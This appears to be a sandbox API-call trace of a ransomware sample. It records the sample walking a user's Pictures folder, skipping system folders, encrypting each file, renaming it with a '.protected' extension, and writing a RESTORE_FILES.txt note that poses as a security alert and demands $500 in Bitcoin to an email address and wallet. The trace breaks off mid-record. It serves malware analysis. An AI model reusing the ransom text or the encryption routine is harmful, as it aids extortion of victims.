0x0 [0092.568] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif") returned 81 [0092.568] StrStrW (lpFirst="MYOVHx_w_H1c1t.gif", lpSrch=".zip") returned 0x0 [0092.568] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.568] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.568] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.569] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.569] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.569] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.569] CloseHandle (hObject=0xd4) returned 1 [0092.570] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif.protected") returned 91 [0092.570] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\myovhx_w_h1c1t.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\MYOVHx_w_H1c1t.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\myovhx_w_h1c1t.gif.protected")) returned 1 [0092.571] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.571] lstrcmpiW (lpString1="oQwknfGJJeI-Z-Df51.bmp", lpString2="Windows") returned -1 [0092.571] lstrcmpiW (lpString1="oQwknfGJJeI-Z-Df51.bmp", lpString2="Program Files") returned -1 [0092.571] lstrcmpiW (lpString1="oQwknfGJJeI-Z-Df51.bmp", lpString2="Program Files (x86)") returned -1 [0092.571] lstrcmpiW (lpString1="oQwknfGJJeI-Z-Df51.bmp", lpString2="$Recycle.bin") returned 1 [0092.571] lstrcmpiW (lpString1="oQwknfGJJeI-Z-Df51.bmp", lpString2="System Volume Information") returned -1 [0092.571] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp") returned 85 [0092.571] StrStrIW (lpFirst="oQwknfGJJeI-Z-Df51.bmp", lpSrch=".protected") returned 0x0 [0092.571] lstrcmpW (lpString1="oQwknfGJJeI-Z-Df51.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0092.571] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.571] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\oqwknfgjjei-z-df51.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp") returned 85 [0092.572] StrStrW (lpFirst="oQwknfGJJeI-Z-Df51.bmp", lpSrch=".txt") returned 0x0 [0092.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp") returned 85 [0092.572] StrStrW (lpFirst="oQwknfGJJeI-Z-Df51.bmp", lpSrch=".rar") returned 0x0 [0092.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp") returned 85 [0092.572] StrStrW (lpFirst="oQwknfGJJeI-Z-Df51.bmp", lpSrch=".zip") returned 0x0 [0092.572] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.573] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.573] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.573] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.573] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.574] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.574] CloseHandle (hObject=0xd4) returned 1 [0092.574] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp.protected") returned 95 [0092.574] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\oqwknfgjjei-z-df51.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\oQwknfGJJeI-Z-Df51.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\oqwknfgjjei-z-df51.bmp.protected")) returned 1 [0092.575] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.575] lstrcmpiW (lpString1="W-ZqjcBjJJ3u4Dz_GIV.gif", lpString2="Windows") returned 1 [0092.575] lstrcmpiW (lpString1="W-ZqjcBjJJ3u4Dz_GIV.gif", lpString2="Program Files") returned 1 [0092.575] lstrcmpiW (lpString1="W-ZqjcBjJJ3u4Dz_GIV.gif", lpString2="Program Files (x86)") returned 1 [0092.575] lstrcmpiW (lpString1="W-ZqjcBjJJ3u4Dz_GIV.gif", lpString2="$Recycle.bin") returned 1 [0092.575] lstrcmpiW (lpString1="W-ZqjcBjJJ3u4Dz_GIV.gif", lpString2="System Volume Information") returned 1 [0092.575] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif") returned 86 [0092.575] StrStrIW (lpFirst="W-ZqjcBjJJ3u4Dz_GIV.gif", lpSrch=".protected") returned 0x0 [0092.575] lstrcmpW (lpString1="W-ZqjcBjJJ3u4Dz_GIV.gif", lpString2="RESTORE_FILES.txt") returned 1 [0092.575] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.575] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.575] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\w-zqjcbjjj3u4dz_giv.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.576] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif") returned 86 [0092.576] StrStrW (lpFirst="W-ZqjcBjJJ3u4Dz_GIV.gif", lpSrch=".txt") returned 0x0 [0092.576] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif") returned 86 [0092.576] StrStrW (lpFirst="W-ZqjcBjJJ3u4Dz_GIV.gif", lpSrch=".rar") returned 0x0 [0092.576] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif") returned 86 [0092.576] StrStrW (lpFirst="W-ZqjcBjJJ3u4Dz_GIV.gif", lpSrch=".zip") returned 0x0 [0092.576] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.577] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.577] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.577] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.577] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.577] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.578] CloseHandle (hObject=0xd4) returned 1 [0092.578] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif.protected") returned 96 [0092.578] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\w-zqjcbjjj3u4dz_giv.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\W-ZqjcBjJJ3u4Dz_GIV.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\w-zqjcbjjj3u4dz_giv.gif.protected")) returned 1 [0092.579] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.579] lstrcmpiW (lpString1="xYnnii.gif", lpString2="Windows") returned 1 [0092.579] lstrcmpiW (lpString1="xYnnii.gif", lpString2="Program Files") returned 1 [0092.579] lstrcmpiW (lpString1="xYnnii.gif", lpString2="Program Files (x86)") returned 1 [0092.579] lstrcmpiW (lpString1="xYnnii.gif", lpString2="$Recycle.bin") returned 1 [0092.579] lstrcmpiW (lpString1="xYnnii.gif", lpString2="System Volume Information") returned 1 [0092.579] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif") returned 73 [0092.579] StrStrIW (lpFirst="xYnnii.gif", lpSrch=".protected") returned 0x0 [0092.579] lstrcmpW (lpString1="xYnnii.gif", lpString2="RESTORE_FILES.txt") returned 1 [0092.579] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.579] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\xynnii.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif") returned 73 [0092.580] StrStrW (lpFirst="xYnnii.gif", lpSrch=".txt") returned 0x0 [0092.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif") returned 73 [0092.580] StrStrW (lpFirst="xYnnii.gif", lpSrch=".rar") returned 0x0 [0092.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif") returned 73 [0092.580] StrStrW (lpFirst="xYnnii.gif", lpSrch=".zip") returned 0x0 [0092.580] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xc99, lpOverlapped=0x0) returned 1 [0092.580] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xfffff367, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.580] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xc99, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xc99, lpOverlapped=0x0) returned 1 [0092.581] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.581] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.581] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.581] CloseHandle (hObject=0xd4) returned 1 [0092.582] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif.protected") returned 83 [0092.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\xynnii.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\xYnnii.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\xynnii.gif.protected")) returned 1 [0092.583] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0092.583] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0092.583] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\RESTORE_FILES.txt") returned 80 [0092.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qDNUfsmEozG2hmfeOlO\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdnufsmeozg2hmfeolo\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.583] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.583] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0092.584] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.584] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0092.584] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.584] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0092.584] CloseHandle (hObject=0xb4) returned 1 [0092.585] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.585] lstrcmpiW (lpString1="qmyA9xPizOU7v.png", lpString2="Windows") returned -1 [0092.585] lstrcmpiW (lpString1="qmyA9xPizOU7v.png", lpString2="Program Files") returned 1 [0092.585] lstrcmpiW (lpString1="qmyA9xPizOU7v.png", lpString2="Program Files (x86)") returned 1 [0092.585] lstrcmpiW (lpString1="qmyA9xPizOU7v.png", lpString2="$Recycle.bin") returned 1 [0092.585] lstrcmpiW (lpString1="qmyA9xPizOU7v.png", lpString2="System Volume Information") returned -1 [0092.585] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png") returned 60 [0092.585] StrStrIW (lpFirst="qmyA9xPizOU7v.png", lpSrch=".protected") returned 0x0 [0092.585] lstrcmpW (lpString1="qmyA9xPizOU7v.png", lpString2="RESTORE_FILES.txt") returned -1 [0092.585] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.585] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qmya9xpizou7v.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.586] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png") returned 60 [0092.586] StrStrW (lpFirst="qmyA9xPizOU7v.png", lpSrch=".txt") returned 0x0 [0092.586] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png") returned 60 [0092.586] StrStrW (lpFirst="qmyA9xPizOU7v.png", lpSrch=".rar") returned 0x0 [0092.586] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png") returned 60 [0092.586] StrStrW (lpFirst="qmyA9xPizOU7v.png", lpSrch=".zip") returned 0x0 [0092.586] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.586] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.587] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.587] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.587] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.587] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.587] CloseHandle (hObject=0xb4) returned 1 [0092.587] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png.protected") returned 70 [0092.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qmya9xpizou7v.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qmyA9xPizOU7v.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qmya9xpizou7v.png.protected")) returned 1 [0092.588] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.588] lstrcmpiW (lpString1="VY8ECdNr.png", 